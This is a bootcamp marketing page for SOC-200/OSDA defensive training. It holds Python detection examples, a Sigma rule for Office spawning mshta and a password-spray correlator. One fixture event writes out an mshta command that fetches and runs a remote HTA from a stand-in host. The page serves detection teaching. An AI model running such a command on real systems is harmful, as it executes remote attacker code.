SOC-200: Foundational Security Operations and Defensive Analysis
Who is it For?
The SOC-200 course is suitable for security professionals looking to improve their defensive analysis and response abilities while earning the OSDA. It is intended for people with a strong background in networking and some familiarity with Linux and Windows platforms.
Exam Details
The OffSec Defense Analyst (OSDA) exam is a demanding 24-hour practical test of your defensive security abilities. You will show your ability to recognise, analyse, and respond to possible threats in a live lab environment. After the exam window closes, you have a further 24 hours to submit a well-structured incident response report.
Related Reading
- SOC Analyst Training in India — CSA vs SOC-200 vs CySA+
- OffSec Learn One India — Pricing + ROI
- Cybersecurity Jobs in Mumbai 2026
Toolkit covered in the SOC-200 (OSDA) bootcamp
SOC-200 is OffSec’s defensive-side certification, leading to the OSDA credential. The bootcamp toolkit is SOC-analyst-focused: SIEM platforms, EDR workflows, log correlation, threat-hunting playbooks, and detection engineering. Unlike offensive certs, the focus is on recognising attacker techniques in telemetry rather than executing them.
- Elastic SIEM (ELK Stack). Macksofy lab uses Elastic SIEM as the primary log-analysis platform. Bootcamp covers the Kibana Query Language (KQL) and EQL, dashboard construction, detection-rule authoring, and alerting workflow.
- Splunk Enterprise (concept walkthrough + lab access). Splunk SPL search language, summary indexes, alert configuration. Lab access provided via Splunk dev license for the bootcamp duration.
- Wazuh (open-source SIEM/XDR). Open-source SIEM workflow. Particularly relevant for Indian SMB SOC roles where Splunk/Elastic costs are prohibitive.
- Microsoft Defender for Endpoint + Sentinel. Enterprise EDR + cloud-SIEM. Kusto Query Language (KQL, a different language from Kibana’s KQL despite the shared acronym) for hunting. Bootcamp includes attack-simulation exercises against M365 telemetry.
- Sysmon for endpoint visibility. Sysmon configuration deep-dive — process creation, network connections, image loads, registry modifications. Bootcamp covers SwiftOnSecurity baseline plus custom rule authoring.
- YARA + Sigma rule authoring. Detection-engineering toolkit. Bootcamp drills both content-based detection (YARA for malware on disk and in memory) and behavioural detection (Sigma rule authoring plus cross-SIEM conversion).
- Velociraptor (endpoint hunting + forensics). Open-source EDR / forensics platform. Bootcamp covers VQL (Velociraptor Query Language), artifact collection, and hunt deployment.
- Wireshark + Zeek + Suricata for network telemetry. Packet-capture analysis, network-IDS rule authoring, and metadata-level inspection of encrypted traffic (Zeek connection and TLS logs rather than decryption).
- Threat intelligence platforms — MISP, OpenCTI. Indicator management, threat-actor profiling, IOC sharing across SOC teams.
- Memory forensics — Volatility 3. Memory dump analysis for malware detection and incident response triage.
- Atomic Red Team + Caldera + Stratus Red Team. Adversary-simulation frameworks for testing detection coverage. Bootcamp uses these for detection-rule validation drills.
- MITRE ATT&CK Navigator + D3FEND. Adversary-technique mapping and defensive-countermeasure framework. Bootcamp explicitly maps every detection drill to ATT&CK technique IDs.
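The Sigma workflow in the toolkit above (write one behavioural rule, test it against events, convert it for whichever SIEM the client runs) is easier to understand with a concrete rule. The block below is an added example written for this page, not bootcamp or OffSec courseware: a Sigma rule for an Office application spawning mshta.exe, expressed as a Python dict in exactly Sigma's field|modifier shape so it runs without PyYAML, a minimal matcher, and an emitter that renders the same logic as Elastic KQL, Sentinel/Defender Kusto and Splunk SPL. The Sysmon events and the allow-listed vendor path in the filter are constructed for the example.

```python
"""Minimal Sigma-style matcher plus cross-SIEM query emitter for a process-creation rule."""

# Python-dict form of a Sigma YAML rule. Field names follow Sigma's windows/process_creation
# logsource; "field|modifier" keys and list values behave as in Sigma. Constructed for this
# example; the allow-listed path in filter_known_good is an assumption, not a real product path.
RULE = {
    "title": "Office application spawning mshta.exe",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": ["\\excel.exe", "\\winword.exe", "\\powerpnt.exe"],
            "Image|endswith": "\\mshta.exe",
        },
        "filter_known_good": {"CommandLine|contains": "C:\\ProgramData\\Vendor\\"},
        "condition": "selection and not filter_known_good",
    },
    "tags": ["attack.execution", "attack.t1218.005", "attack.initial_access", "attack.t1566.001"],
}

# Sigma field names -> backend field names. Elastic uses ECS; Sentinel/Defender uses
# DeviceProcessEvents columns; the Splunk Sysmon add-on keeps the Sysmon names.
FIELD_MAPS = {
    "elastic": {"ParentImage": "process.parent.executable", "Image": "process.executable",
                "CommandLine": "process.command_line"},
    "kusto": {"ParentImage": "InitiatingProcessFolderPath", "Image": "FolderPath",
              "CommandLine": "ProcessCommandLine"},
    "spl": {},
}

def _values(expected):
    return expected if isinstance(expected, list) else [expected]

def _field_matches(event, key, expected):
    """One Sigma map entry (field|modifier) against an event; list values are ORed."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for exp in (str(v).lower() for v in _values(expected)):
        if (modifier == "endswith" and value.endswith(exp)
                or modifier == "startswith" and value.startswith(exp)
                or modifier == "contains" and exp in value
                or modifier == "" and value == exp):
            return True
    return False

def _selection_matches(event, selection):
    return all(_field_matches(event, k, v) for k, v in selection.items())  # map entries are ANDed

def rule_matches(rule, event):
    """Evaluate the rule; only the 'X and not Y' condition shape is supported here."""
    det = rule["detection"]
    pos, neg = det["condition"].split(" and not ")
    return _selection_matches(event, det[pos]) and not _selection_matches(event, det[neg])

def run_rule(rule, events):
    return [e for e in events if rule_matches(rule, e)]

def _term(backend, field, modifier, value):
    f = FIELD_MAPS[backend].get(field, field)
    v = value.replace("\\", "\\\\")  # all three query languages treat backslash as an escape
    if backend == "kusto":
        op = {"endswith": "endswith", "startswith": "startswith", "contains": "contains", "": "=~"}[modifier]
        return f'{f} {op} "{v}"'
    left = "*" if modifier in ("endswith", "contains") else ""
    right = "*" if modifier in ("startswith", "contains") else ""
    return f"{f}:{left}{v}{right}" if backend == "elastic" else f'{f}="{left}{v}{right}"'

def _selection_to_query(backend, selection):
    OR, AND = (" OR ", " AND ") if backend == "spl" else (" or ", " and ")
    clauses = []
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        terms = [_term(backend, field, modifier, str(v)) for v in _values(expected)]
        clauses.append(f"({OR.join(terms)})" if len(terms) > 1 else terms[0])
    return AND.join(clauses)

def rule_to_query(rule, backend):
    """Emit the rule as Elastic KQL, Sentinel/Defender KQL (Kusto) or Splunk SPL."""
    det = rule["detection"]
    pos, neg = det["condition"].split(" and not ")
    AND, NOT = {"spl": (" AND ", "NOT ("), "kusto": (" and ", "not("), "elastic": (" and ", "not (")}[backend]
    body = _selection_to_query(backend, det[pos]) + AND + NOT + _selection_to_query(backend, det[neg]) + ")"
    if backend == "kusto":
        return "DeviceProcessEvents | where " + body
    if backend == "spl":
        return "index=sysmon EventCode=1 " + body
    return body

# Constructed Sysmon event ID 1 records as they would arrive from the SIEM.
EVENTS = [
    {"host": "FIN-WS07", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://cdn.example.net/r/inv.hta"},
    {"host": "FIN-WS07", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\Users\\a.patel\\app.hta"},
    {"host": "HR-WS02", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\ProgramData\\Vendor\\update.hta"},
]

if __name__ == "__main__":
    for hit in run_rule(RULE, EVENTS):
        print("HIT", hit["host"], hit["CommandLine"])
    for backend in ("elastic", "kusto", "spl"):
        print(backend, "=>", rule_to_query(RULE, backend))
```

Only the first event fires: the second has the wrong parent, the third is removed by the filter. The matcher lower-cases both sides, but the emitted queries do not behave identically on case: Kusto's endswith and SPL wildcard field matches are case-insensitive, while an Elastic KQL wildcard against a keyword field is case-sensitive unless the index applies a normalizer, which is exactly the kind of backend difference the cross-SIEM testing drills are meant to catch.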
What the Macksofy SOC-200 lab environment looks like
The SOC-200 bootcamp lab is a multi-source telemetry environment — Windows + Linux endpoints, Active Directory, M365 cloud activity, network-edge logs — all flowing into Elastic SIEM with Sysmon, Defender EDR, Zeek IDS, and Velociraptor visibility. Macksofy mentors run live adversary-simulation attacks throughout the bootcamp; students hunt the activity in real time across SIEM queries and EDR consoles.
- Weeks 1-2 (SOC fundamentals + log analysis): SIEM query languages (KQL, SPL, EQL), Sysmon event-ID deep-dive, Windows / Linux audit-log analysis, false-positive vs true-positive triage.
- Weeks 3-4 (Initial access detection): Phishing-payload detection workflow, macro / HTA / LNK execution telemetry, AMSI bypass detection, suspicious-process-tree analysis.
- Weeks 5-6 (Persistence + Privilege Escalation detection): Registry/scheduled-task/service persistence indicators, token impersonation alerts, UAC bypass detection, SUID/sudo abuse on Linux.
- Weeks 7-8 (Lateral movement + AD attack detection): Kerberoasting/ASREP detection, NTLM relay indicators, BloodHound activity recognition (collection-time signatures), DCSync / Golden Ticket alerts.
- Weeks 9-10 (C2 + Exfiltration detection): Beacon detection (jitter analysis, callback profile), DNS tunnelling indicators, anomalous-outbound-traffic profiling, data-staging detection.
- Weeks 11-12 (Detection engineering + exam-prep): Sigma rule authoring with cross-SIEM testing, threat-hunting hypothesis development, mock 24-hour exam attempts.
Total hands-on hours: ~280 hours over 12 weeks. Live adversary-simulation drops happen 3-5 times per week (mentor-driven); students learn to hunt within real-time pressure rather than from canned alerts.
SOC-200 (OSDA) exam structure and scoring
The SOC-200 exam (OSDA — Offensive Security Defense Analyst) is a 24-hour hands-on detection-and-response window followed by a 24-hour report-writing window (48 hours total). OffSec provisions an exam environment with multi-source telemetry feeds (SIEM + EDR + endpoint + network); candidates investigate a series of attack scenarios, document the attack chain via observable evidence, and demonstrate detection-engineering capability.
Scoring breakdown: Multiple attack scenarios are presented. For each scenario, candidates must identify the initial-access vector, trace the post-exploitation chain across all telemetry sources, identify all affected hosts/users, and document attacker-controlled IOCs. Scoring is per scenario, with bonus credit for ATT&CK technique-ID accuracy and Sigma rule authoring for the detected attacks. Pass mark is 70/100.
Bootcamp exam-day playbook: Hours 1-3 are baseline triage — review the telemetry sources, understand the environment normality, identify obvious anomalies. Hours 3-12 are deep-dive on scenario 1 with full chain documentation. Hours 12-20 are scenarios 2-3. Hours 20-24 are buffer + screenshot validation. Report due in subsequent 24-hour window.
Retake strategy: Standard OffSec retake terms apply (additional exam fee, 14-day cooldown). Macksofy historical first-attempt pass rate is ~65% with prepared candidates — defensive-side certifications tend to have higher pass rates than offensive equivalents because the scoring rubric rewards thorough documentation rather than novel exploitation.
SOC-200 / OSDA career outcomes in the India market — 2026
The OSDA credential is rapidly becoming the gold-standard defensive certification in India SOC hiring — particularly at managed-security-service-providers (MSSPs), GCC SOC teams, and BFSI security operations centres. Of 250 sampled India ‘SOC analyst (L2/L3)’ / ‘threat hunter’ / ‘detection engineer’ JDs in Q1 2026, 38% mention OSDA as preferred (vs ~20% for GIAC GCIH and ~15% for CompTIA CySA+).
Salary bands (India, 2026):
- L1 SOC Analyst + OSDA: ₹6-12 LPA at MSSPs (Paladion / Atos / Wipro), ₹10-18 LPA at GCC SOC teams (Microsoft IDC, Amazon, Google).
- L2/L3 SOC Analyst + OSDA + secondary cert (Splunk SOC Operations / Elastic Engineer): ₹16-28 LPA at lead-analyst / threat-hunter roles.
- Detection Engineer + OSDA + 4+ years: ₹28-45 LPA at SOC engineering / detection-as-code specialist roles, particularly at fintech and SaaS firms scaling SOC capability.
- Incident Response Lead + OSDA + 5+ years: ₹38-65 LPA at IR-lead / SOC-manager roles, particularly at BFSI and consulting firms running 24/7 SOCs.
Average time-to-first-offer post-OSDA: 5-10 weeks for candidates with prior SOC experience. The OSDA holder pool in India is still small (estimated <500 in early 2026) which keeps salary premiums elevated. Macksofy placement cell maintains warm-intro relationships with Paladion, Atos India, Wipro Cyber Defence, Cisco SOC (Bangalore), and 15+ GCC SOC teams.
SOC-200 / OSDA vs adjacent certs — when to pick what
OSDA vs GIAC GCIH (GIAC Certified Incident Handler): GCIH is the established defensive-side credential — ~USD 979 exam, 4-hour multiple-choice + simulated-environment items. Strong US/EU enterprise recognition. OSDA is newer (2022) and hands-on. Pick GCIH if your manager values established credentialing or US-federal compliance. Pick OSDA for hands-on skill demonstration and growing India recognition.
OSDA vs CompTIA CySA+: CySA+ is foundational ($404, performance-based items). OSDA is professional-tier hands-on. Stack them — CySA+ first as foundational SOC analyst signal, OSDA second for hands-on threat-hunting capability.
OSDA vs Blue Team Level 1 / Blue Team Level 2 (Security Blue Team): BTL1 (~£399) and BTL2 are practical defensive certifications growing in India recognition. BTL1 is foundational; BTL2 is mid-level. OSDA sits between BTL1 and BTL2 in difficulty, with the OffSec brand carrying broader recruiter recognition.
OSDA vs SANS SEC503 (Intrusion Detection In-Depth): SEC503 is the network-focused defensive course leading to GCIA. OSDA is broader — covers SIEM + EDR + endpoint + network, not just network IDS. OSDA is the better fit for modern SOC roles where multi-source telemetry is the norm.
Sample bootcamp walkthrough — detecting an evasive AD attack chain
A representative bootcamp detection scenario — mentor runs a live OSEP-style evasive AD attack; students hunt the activity in Elastic SIEM + Defender + Velociraptor:
- Initial alert triage (15 min): Defender raises a low-severity alert on suspicious Office macro execution. Most SOCs would dismiss as user-error. Bootcamp drills the discipline of full investigation regardless.
- Process tree analysis (20 min): Sysmon event ID 1 + 7 + 8 events in Elastic. excel.exe spawned mshta.exe with HTTP URL argument. Process tree extends through 4 layers of LOLBin chaining.
- Network telemetry correlation (15 min): Zeek HTTP log shows the mshta download. Suricata didn’t fire (the URL was on a legitimate CDN). Defender Network Inspection didn’t flag either. The bootcamp covers when network IDS misses LOLBin chains.
- Implant detection (25 min): Velociraptor hunt for process-injection indicators. Find a thread in procexp64.exe whose start address lies in memory not backed by an image on disk. Dump the region; string and YARA scanning in Volatility 3 reveals Sliver-implant artefacts.
- AMSI bypass detection (15 min): Search PowerShell Script Block Logging (event ID 4104, with Module Logging event ID 4103 as a secondary source) for script text that tampers with the amsiInitFailed field. Find the bypass execution timestamp.
- Lateral movement detection (30 min): A CrackMapExec password spray (one password tried against many accounts over SMB) fires 4625 failed-logon events on target hosts across the domain. Spotted via an Elastic detection rule (5+ failed logons from a single source across 10+ hosts within 60 seconds). The follow-on 4624 network logon (type 3) from the compromised service account on a host it had never touched before is the confirmation.
- BloodHound activity detection (15 min): SharpHound collection generated 4662 events on multiple DC objects. Bootcamp ships a Sigma rule that detects SharpHound collection signatures. Confirm via execution timestamp.
- Privilege escalation detection (20 min): Shadow Credentials attack via msDS-KeyCredentialLink modification — flagged via 5136 directory-object-modification event. Bootcamp drills the audit-policy configuration that surfaces this attack class.
- Crown jewel detection (10 min): Defender raises a high-severity alert on Mimikatz reading LSASS memory (process-access telemetry; Sysmon event ID 10 records the same handle request). Spot the timestamp; correlate with the post-escalation timeline.
- IR report (90 min): Full attack chain documented with ATT&CK technique IDs (T1566 / T1218.005 / T1059.001 / T1003.001 etc.), affected hosts, attacker-controlled IOCs, recommended detection-rule improvements.
Total time on a familiar attack pattern: ~4 hours. Exam variant adds unknown-attacker-techniques — but the workflow (triage → process-tree → telemetry-correlation → ATT&CK mapping → report) is identical.
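The lateral-movement step above hinges on one stateful correlation: many 4625 failures from one source inside a short window, then a 4624 success for an account that was in the spray set. The block below is an added example written for this page, not bootcamp code or an Elastic rule export. It implements that rule with the thresholds the walkthrough quotes (5+ failures across 10+ hosts in 60 seconds) over constructed Security-log events; the 30-minute follow-up window for the success correlation is an assumption.

```python
"""Windowed password-spray detection over Windows Security events, followed by
'success after spray' correlation (4625 failures, then a 4624 network logon)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)       # thresholds quoted in the bootcamp rule
MIN_FAILURES, MIN_HOSTS = 5, 10
FOLLOW_UP = timedelta(minutes=30)    # assumption: how long after a spray a success stays suspicious

# Constructed events in arrival order:
# (TimeCreated, EventID, Computer, TargetUserName, IpAddress, LogonType)
_SPRAY_TARGETS = ["a.patel", "b.rao", "c.mehta", "d.iyer", "e.nair", "f.khan",
                  "g.das", "h.bose", "i.roy", "j.sen", "k.shah", "svc_backup"]
RAW_EVENTS = [
    (f"2026-02-10T09:14:{3 * i:02d}", 4625, f"FIN-WS{i + 1:02d}", user, "10.20.5.31", 3)
    for i, user in enumerate(_SPRAY_TARGETS)            # one password, twelve accounts, twelve hosts
] + [
    ("2026-02-10T09:14:20", 4625, "HR-WS01", "j.singh", "10.20.7.9", 2),   # benign typo, twice
    ("2026-02-10T09:14:35", 4625, "HR-WS01", "j.singh", "10.20.7.9", 2),
    ("2026-02-10T09:15:40", 4624, "FS03", "svc_backup", "10.20.5.31", 3),  # sprayed account succeeds
    ("2026-02-10T09:15:50", 4624, "FS03", "c.mehta", "10.20.9.4", 3),      # unrelated normal logon
]

def parse_events(raw):
    return [dict(ts=datetime.fromisoformat(t), event_id=e, host=h, user=u, src=s, logon_type=lt)
            for t, e, h, u, s, lt in raw]

def detect(events):
    """Return spray alerts and success-after-spray alerts in detection order."""
    alerts = []
    failures = defaultdict(deque)    # source IP -> 4625s inside the sliding WINDOW
    sprays = {}                      # source IP -> {"at": first alert time, "accounts": set}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event_id"] == 4625:
            q = failures[ev["src"]]
            q.append(ev)
            while q and ev["ts"] - q[0]["ts"] > WINDOW:
                q.popleft()
            hosts = {f["host"] for f in q}
            accounts = {f["user"] for f in q}
            if len(q) >= MIN_FAILURES and len(hosts) >= MIN_HOSTS:
                if ev["src"] not in sprays:      # alert once per source, not once per event
                    alerts.append({"type": "password_spray", "src": ev["src"], "at": ev["ts"],
                                   "hosts": len(hosts), "accounts": len(accounts)})
                    sprays[ev["src"]] = {"at": ev["ts"], "accounts": set()}
                sprays[ev["src"]]["accounts"] |= accounts   # keep extending the target set
        elif ev["event_id"] == 4624 and ev["logon_type"] == 3:
            spray = sprays.get(ev["src"])
            if spray and ev["user"] in spray["accounts"] \
                    and timedelta(0) <= ev["ts"] - spray["at"] <= FOLLOW_UP:
                alerts.append({"type": "success_after_spray", "src": ev["src"],
                               "user": ev["user"], "host": ev["host"], "at": ev["ts"]})
    return alerts

if __name__ == "__main__":
    for alert in detect(parse_events(RAW_EVENTS)):
        print(alert)
```

Two design points matter in practice: the alert is keyed on the source address rather than the target host, because a spray is one source touching many hosts and per-host thresholds would never trip; and the account set keeps growing after the first alert so that the success correlation still catches the account sprayed last, which is exactly the service account that succeeds here.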
Readiness checklist before joining the SOC-200 bootcamp
SOC-200 is mid-level defensive; foundational SOC experience is the typical prerequisite. Self-assess against this list; seven of ten is a safe baseline.
- Comfortable in Windows and Linux command lines.
- Understand the OSI layers, TCP/UDP, common ports, and DNS at concept level.
- Have used at least one SIEM platform (Splunk / Elastic / QRadar / Sentinel) in a job or lab context.
- Understand Windows Event Logs at concept level — security log, system log, application log.
- Familiar with the MITRE ATT&CK framework — tactics, techniques, mitigations.
- Have read 2-3 public incident-response writeups (CrowdStrike, Mandiant, SANS InfoSec Reading Room).
- Comfortable reading SQL and basic regex.
- Understand at concept level: privilege escalation, lateral movement, persistence, C2 callback patterns.
- Can dedicate 12-15 study hours per week consistently for 12 weeks.
- Have a workstation with 16GB+ RAM (for local SIEM lab spin-up).
0-2 years SOC L1/L2 field experience is the typical SOC-200 candidate profile. Career-switchers from infrastructure / sysadmin / network-admin roles are admitted with a Macksofy technical interview demonstrating equivalent baseline. Macksofy ships a 4-week ‘SOC Foundations’ bridge for candidates without prior SOC field experience.
Frequently asked questions — SOC-200 bootcamp
Is Macksofy an Offensive Security Authorized Training Partner for SOC-200?
No. Macksofy Trainings runs an independent exam-prep bootcamp for SOC-200 (OSDA). We are not an Offensive Security Authorized Training Partner. OffSec exam vouchers, lab subscriptions, and the official SOC-200 courseware must be purchased directly from OffSec.com. Our bootcamp fee covers Macksofy-built lab infrastructure, mentored sessions, and exam-prep methodology only.
What is OSDA?
OSDA stands for Offensive Security Defense Analyst — the certification awarded for passing the SOC-200 exam. It is OffSec’s defensive-side credential, complementary to the OSCP / OSEP / OSWE offensive credentials.
How much does the SOC-200 exam cost?
OffSec charges approximately USD 1,749 for the SOC-200 exam + 90-day lab subscription. Pricing changes — confirm at offsec.com/pricing. The Macksofy bootcamp fee is exclusive of OffSec charges.
How long is the OSDA exam?
24-hour hands-on detection-and-response window + 24-hour report-writing window (48 hours total). Pass mark is 70/100 across multiple attack scenarios with bonus credit for ATT&CK technique accuracy and Sigma rule authoring.
Do I need prior SOC field experience?
Strongly recommended. 0-2 years SOC L1/L2 experience is the typical OSDA candidate profile. Career-switchers from infrastructure roles can be admitted with a Macksofy technical interview demonstrating equivalent baseline, plus may require the 4-week SOC Foundations bridge module.
How does OSDA compare to GIAC GCIH?
GCIH is the established defensive-side certification — USD 979, 4-hour multiple-choice + simulated items, strong US recognition. OSDA is newer (2022) and hands-on — broader telemetry-source coverage (SIEM + EDR + endpoint + network), India recognition is growing fast. Pick GCIH for US-federal compliance; pick OSDA for hands-on skill demonstration.
Will the OSDA exam test specific SIEM platforms?
OffSec provides the SIEM (typically Elastic-based) for the exam. Candidates don’t need expert-level Splunk or QRadar fluency to pass. The bootcamp drills cross-SIEM transferable skills — query-language reflexes that apply to Splunk SPL, KQL, and EQL with minor syntactic adaptation.
Is Sigma rule authoring on the OSDA exam?
Yes. The exam scoring rubric explicitly rewards Sigma rule authoring for detected attacks. The bootcamp drills Sigma rule writing with cross-SIEM conversion testing throughout the program.
What India SOC jobs recognise OSDA?
OSDA is recognised at MSSPs (Paladion / Atos / Wipro), GCC SOC teams (Microsoft IDC, Amazon, Google), BFSI security operations centres, and fintech SOC engineering teams. India hiring recognition is growing rapidly — 38% of L2/L3 SOC analyst JDs mention OSDA as preferred in Q1 2026 sampling.
Will I get placement assistance after passing OSDA?
Yes. Macksofy placement cell maintains warm-intro relationships with Paladion, Atos India, Wipro Cyber Defence, Cisco SOC Bangalore, and 15+ GCC SOC teams. OSDA-credentialed candidates with 2+ years SOC experience are placed quickly — typically 5-10 weeks post-certification.
Day-in-the-life of an OSDA-credentialed SOC analyst — India 2026
The most-asked question from SOC-200 candidates before enrolling: ‘what do I actually do daily after I’m hired into an OSDA-credentialed SOC role?’ The honest answer differs by SOC tier and organisation size. Macksofy bootcamp instructors include practitioners currently working at India MSSP and GCC SOC teams; the cadence below reflects 2025-2026 field reality.
L2 Analyst at an India MSSP (Paladion / Atos / Wipro Cyber Defence model):
- 09:00-09:30: Shift handover from outgoing analyst. Triage queue of overnight alerts: typically 80-150 alerts per shift across 8-15 client SIEMs. Most are L1-triaged false-positives requiring L2 confirmation; 5-10 require active investigation.
- 09:30-13:00: Investigation work on the 5-10 confirmed alerts. Typical workflow: SIEM query for additional context → EDR console for process-tree analysis → memory/disk acquisition if endpoint compromise suspected → IOC enrichment via threat-intel platform → containment recommendation to client incident-response liaison.
- 13:00-14:00: Lunch. SOC analyst burnout is real; senior analysts protect lunch breaks aggressively.
- 14:00-17:00: Client deliverables — weekly threat summaries, detection-coverage reports, post-incident reviews. Plus ongoing SIEM tuning to reduce false-positive volume on the next shift.
- 17:00-18:00: Threat-hunting time-box. Most mature MSSPs allocate 5-10 hours/week to proactive hunting. Use the time for hypothesis-driven hunts: ‘are any of our 12 clients showing IOCs from this week’s published threat actor report?’
- 18:00: Shift handover to outgoing-day-shift analyst. Document open-investigation context for the night-shift analyst.
Detection Engineer at a GCC SOC (Microsoft IDC / Amazon / Google model): Different cadence entirely. ~70% of time on detection-rule authoring and tuning (Sigma → KQL → Sentinel/Defender deployment). ~20% on adversary-simulation purple-team exercises with internal red-team. ~10% on incident-response surge support. The OSDA credential is the standard hiring-floor signal for this role; SANS GIAC senior certs (GCIA / GCFA / GCFE) are typical secondary stacks.
Incident Response Lead at a BFSI SOC: 24/7 on-call rotation (typically 1-week-on, 3-weeks-off). Activity bursts during incidents (24-72 hour high-intensity engagements) with quieter cadence between. Most BFSI IR roles in India require OSDA + GIAC GCIH + a regulatory credential (CISA or CISM) for senior promotion.
What OSDA-holders consistently report as the best parts of the role: Pattern-recognition mastery (you start seeing attack chains across alert noise that L1 analysts miss); cross-organisation visibility (MSSP roles especially); intellectual satisfaction of detection-engineering work. Worst parts: Burnout from alert-volume overload (mitigated by good SOC management); on-call rotation impact on personal life (varies by employer); slow detection-rule deployment velocity at large enterprises with change-management overhead.
Related reading: The defensive side of ransomware, BYOVD and living-off-the-land detection maps directly to the 10 attack techniques defining cybersecurity in 2026 — see how the technique you are training for shows up in real 2026 intrusions.
Pricing note: The listed course price is for the course and certification package. Personalised instructor-led training and one-on-one mentorship are charged separately — contact our team for a customised training and mentorship quote.
Train from anywhere in India: SOC-200 (OSDA) runs as live online cohorts for learners nationwide. See local employer and salary context for your city on our cybersecurity training locations page.
Curriculum
- 10 Sections
- 10 Lessons
- 60 Hours
- Attack Methodology Introduction (1 lesson)
- Windows Endpoint Introduction (1 lesson)
- Windows Server Side Attacks (1 lesson)
- Windows Client-Side Attacks (1 lesson)
- Windows Privilege Escalation (1 lesson)
- Windows Persistence (1 lesson)
- Linux Endpoint Introduction (1 lesson)
- Linux Server Side Attacks (1 lesson)
- Network Detections (1 lesson)
- Antivirus Alerts and Evasion (1 lesson)